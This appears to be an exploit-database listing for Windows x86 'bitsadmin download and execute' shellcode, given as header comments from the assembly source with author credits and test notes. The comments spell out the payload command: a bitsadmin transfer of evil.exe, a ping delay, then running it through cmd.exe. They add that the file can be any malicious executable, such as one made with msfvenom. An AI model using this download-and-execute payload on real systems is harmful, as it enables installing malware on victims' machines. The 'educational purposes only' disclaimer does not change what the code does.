Exploits / Vulnerability Discovered : 2019-06-27 |
Type : shellcode |
Platform : windows_x86
This exploit / vulnerability Windows/x86 bitsadmin download and execute ( "c:evil.exe") shellcode (210 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
; Shellcode Title : bitsadmin download and execute
; Shellcode Author : Joseph McDonagh
; Date June 26, 2019
; Shellcode Length 210
; However, if the application you are exploiting already loads it, then all you need ...
; ... is the System Call and ExitProcess in kernel32.dll
; In between download and execute is ping -n 30 localhost, which provides a delay for the ...
; ... relatively slow bitsadmin.exe program
; Tested on Windows XP SP2
; Acknowledgement to Kartik Durg, who inspired me to start making my own shellcode
; after reading iamroot blog
; Acknowledgement to POB, using start has really helped me alot in manual shellcode efforts
; start bitsadmin.exe /transfer "njob30" "c:\evil.exe" && ping -n 30 && cmd.exe /c c:\evil.exe
; evil.exe can be generated by msfvenom, or be ANY malcious executable you happen to have
; EDB-Note: start bitsadmin.exe /transfer "n job30" "c:\evil.exe" && ping -n 30 && cmd.exe /c c:\evil.exe